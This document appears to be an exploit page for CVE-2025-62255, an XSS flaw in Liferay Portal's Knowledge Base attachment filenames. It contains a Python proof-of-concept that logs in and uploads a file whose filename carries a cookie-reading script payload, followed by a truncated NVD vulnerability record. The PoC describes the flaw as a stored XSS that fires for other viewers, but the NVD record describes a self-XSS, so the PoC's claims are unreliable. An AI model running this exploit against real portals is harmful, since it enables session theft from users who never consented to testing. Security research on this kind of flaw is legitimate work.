CVE-2025-62255

# CVE-2025-62255 PoC - Liferay Portal Stored XSS in Knowledge Base Attachment Filename # This PoC demonstrates the stored XSS vulnerability via attachment filename injection import requests import json # Configuration target_url = "https://target-liferay-portal.com" cve_id = "CVE-2025-62255" # XSS Payload for attachment filename # The payload uses an image tag with onerror handler to execute JavaScript xss_payload = '<img src=x onerror=alert(document.cookie)>' # Authentication credentials auth_creds = { "username": "[email protected]", "password": "password123" } def exploit_stored_xss(): """ Exploit stored XSS in Liferay Knowledge Base article attachment filename Steps: 1. Authenticate to Liferay Portal 2. Create or access a Knowledge Base article 3. Upload attachment with malicious filename 4. The XSS will trigger when other users view the article """ # Step 1: Login to Liferay Portal login_url = f"{target_url}/c/portal/login" session = requests.Session() login_data = { "login": auth_creds["username"], "password": auth_creds["password"], "redirect": "/" } response = session.post(login_url, data=login_data) if response.status_code != 200: print(f"[-] Login failed") return False print("[+] Successfully authenticated") # Step 2: Navigate to Knowledge Base article editor kb_editor_url = f"{target_url}/group/control_panel/manage?p_p_id=101_INSTANCE_kb_article" # Step 3: Upload attachment with XSS payload in filename upload_url = f"{target_url}/api/jsonws/dlapp/add-file-entry" files = { "file": (f"{xss_payload}.jpg", b"fake_image_data", "image/jpeg") } upload_data = { "repositoryId": "10181", "folderId": "0", "sourceFileName": f"{xss_payload}.jpg", # Malicious filename "mimeType": "image/jpeg", "title": f"{xss_payload}.jpg", "description": "Malicious attachment for XSS testing" } response = session.post(upload_url, data=upload_data, files=files) if response.status_code == 200: print(f"[+] XSS payload uploaded successfully") print(f"[+] Payload: {xss_payload}") print(f"[+] The XSS will execute when users view the Knowledge Base article") return True else: print(f"[-] Upload failed: {response.status_code}") return False def verify_vulnerability(): """ Verify the XSS vulnerability exists by checking the response """ print(f"\n[*] Verifying {cve_id}...") print(f"[*] Target: {target_url}") print(f"[*] Vulnerability Type: Stored XSS in Knowledge Base Attachment Filename") print(f"[*] Affected Versions: Liferay Portal 7.4.0-7.4.3.101, Liferay DXP 2023.Q3.1-2023.Q3.5") if __name__ == "__main__": verify_vulnerability() # Note: Run exploit_stored_xss() only in authorized security testing # exploit_stored_xss()

{"cve": {"id": "CVE-2025-62255", "sourceIdentifier": "[email protected]", "published": "2025-10-23T19:15:50.987", "lastModified": "2025-12-12T20:40:21.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Self Cross-site scripting (XSS) vulnerability on the edit Knowledge Base article page in Liferay Portal 7.4.0 through 7.4.3.101, and older unsupported versions, and Liferay DXP 2023.Q3.1 through 2023.Q3.5, 7.4 GA through update 92, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into an attachment's filename."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.3", "matchCriteriaId": "EF5BFC45-3970-43D5-A064-D8785677E26C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "324106E0-0AA8-42EB-80C7-21AC59ECDC57"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:-:*:*:*:*:*:*", "matchCriteriaId": "6F6A98ED-E694-4F39-95D0-C152BD1EC115"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_1:*:*:*:*:*:*", "matchCriteriaId": "2CD6861A-D546-462F-8B22-FA76A4AF8A9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_2:*:*:*:*:*:*", "matchCriteriaId": "324BB977-5AAC-4367-98FC-605FF4997B3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_1:*:*:*:*:*:*", "matchCriteriaId": "2BBA40AC-4619-434B-90CF-4D29A1CA6D86"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_2:*:*:*:*:*:*", "matchCriteriaId": "135BED68-C2EC-4EE7-9138-91E0EE3608EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_3:*:*:*:*:*:*", "matchCriteriaId": "728DF154-F19F-454C-87CA-1E755107F2A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update1:*:*:*:*:*:*", "matchCriteriaId": "35F42314-AC3F-45B6-8BF8-49811E5F2FAB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update10:*:*:*:*:*:*", "matchCriteriaId": "AA984F92-4C6C-4049-A731-96F587B51E75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update11:*:*:*:*:*:*", "matchCriteriaId": "CADDF499-DDC4-4CEE-B512-404EA2024FCB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update12:*:*:*:*:*:*", "matchCriteriaId": "9EC64246-1039-4009-B9BD-7828FA0FA1C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update13:*: ... (truncated)